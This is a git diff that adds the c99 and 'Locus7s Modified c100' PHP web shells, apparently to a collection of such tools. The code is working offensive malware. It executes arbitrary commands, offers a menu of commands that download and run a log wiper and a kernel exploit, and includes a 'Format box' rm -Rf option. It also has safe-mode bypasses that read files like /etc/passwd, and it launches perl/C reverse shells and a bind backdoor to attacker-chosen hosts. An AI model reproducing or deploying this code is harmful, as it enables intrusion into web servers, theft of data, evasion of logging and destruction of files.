+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. 
$imgequals = array(
+ "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+ "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+ "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+ "ext_html"=>array("ext_html","ext_htm"),
+ "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+ "ext_lnk"=>array("ext_lnk","ext_url"),
+ "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+ "ext_doc"=>array("ext_doc","ext_dot"),
+ "ext_js"=>array("ext_js","ext_vbs"),
+ "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+ "ext_wri"=>array("ext_wri","ext_rtf"),
+ "ext_swf"=>array("ext_swf","ext_fla"),
+ "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+ "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+ if (empty($images[$img])) {$img = "small_unk";}
+ if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+ echo base64_decode($images[$img]);
+ }
+ else
+ {
+ foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning!
Remove \$images[".$d."]<br>");}}}}
+ natsort($images);
+ $k = array_keys($images);
+ echo "<center>";
+ foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+ echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse"
cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? 
+ <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"> + <br> + Warning. Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" 
method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> + + + + + + + + + + + + + + + + + + + + + + + + + + +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden 
name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input 
type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> PSych0 | <a href=""><font color="#FF0000">Cuz N0wH?R? iS s?cu? ?enough</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/php/PHPshell/c99_locus7s/c99_locus7s.jpg b/php/PHPshell/c99_locus7s/c99_locus7s.jpg
new file mode 100644
index 0000000..f3c9576
Binary files /dev/null and b/php/PHPshell/c99_locus7s/c99_locus7s.jpg differ
diff --git a/php/PHPshell/c99_locus7s/c99_locus7s.php b/php/PHPshell/c99_locus7s/c99_locus7s.php
new file mode 100644
index 0000000..cb3fe60
--- /dev/null
+++ b/php/PHPshell/c99_locus7s/c99_locus7s.php
@@ -0,0 +1,3595 @@ +<?php + +/****************************************************************************************** +* Locus7s Modified c100 Shell +* Beta v. 1.0a - Project x2300 +* Written by Captain Crunch Team +* Modified by Shadow & Preddy +* Re-Modified by #!physx^ (15.2.07) +*======================================================== +* New Modifications Implemented -- ++--------------------------------------------------------+ +* -Added link to Enumerate to escalate priviledges +* -Added Rootshell.c +* -Added Rootshell.c;auto-compiler +* -Execute Rootshell.c +* -Added Mig-Log Logcleaner +* -Execute Mig-Log Logcleaner +* -milw0rm searcher (Grabs OS and searches milw0rm) +* -Locus7s Style & Image +* -Added w4ck1ng Shell Backdoor Connect and Backdoor +* -Added PHP-Proxy link to hide your ass +* -Added your ip and server ip with whois capability +* -Added private 0day released by allahaka which utilizes the linux +* sudo bash to execute a stack overflow. +*======================================================== +* FEB. 14, 2007 RELEASE NOTES: ++--------------------------------------------------------+ +* PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS +* FAILURE TO DO SO WILL RESULT IN LOSS OF VIP +* MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. +*======================================================== +* PRODUCT INFO: ++--------------------------------------------------------+ +* C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM +* WWW.CCTEAM.RU +* C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S +* UNDERGROUND NETWORK | WWW.LOCUS7S.COM +* \E0T/ +*********************************************************/ + +//for php proxy purposes + +function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? 
"" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); } +$selfurl = base64_encode(selfURL()); +$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl; + +//end of link + +//milw0rm search +$Lversion = php_uname(r); +$OSV = php_uname(s); +if(eregi("Linux",$OSV)) +{ +$Lversion=substr($Lversion,0,6); +$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion; +}else{ +$Lversion=substr($Lversion,0,3); +$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; +} +//End of milw0rm search + + +//w4ck1ng Shell +if (!function_exists("myshellexec")) +{ +if(is_callable("popen")){ +function myshellexec($command) { +if (!($p=popen("($command)2>&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + +$proxy_shit=""; + +$back_connect_c=""; + +$back_connect="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"; + +$backdoor=""; + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { 
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>"; +} else { +$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>"; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." 
".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." 
&"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>"; +} + +function bberr() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +//EoW + + + + + + + + + + + + + + + + +//Start Enumerate function +//function ENUMERATE() + +$hostname_x=php_uname(n); +$itshome = getcwd(); +$itshome = str_replace("/home/","~",$itshome); +$itshome = str_replace("/public_html","/x2300.php",$itshome); +$enumerate = "http://".$hostname_x."/".$itshome.""; + +//End Enumerate function + +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function 
getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0a beta"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = 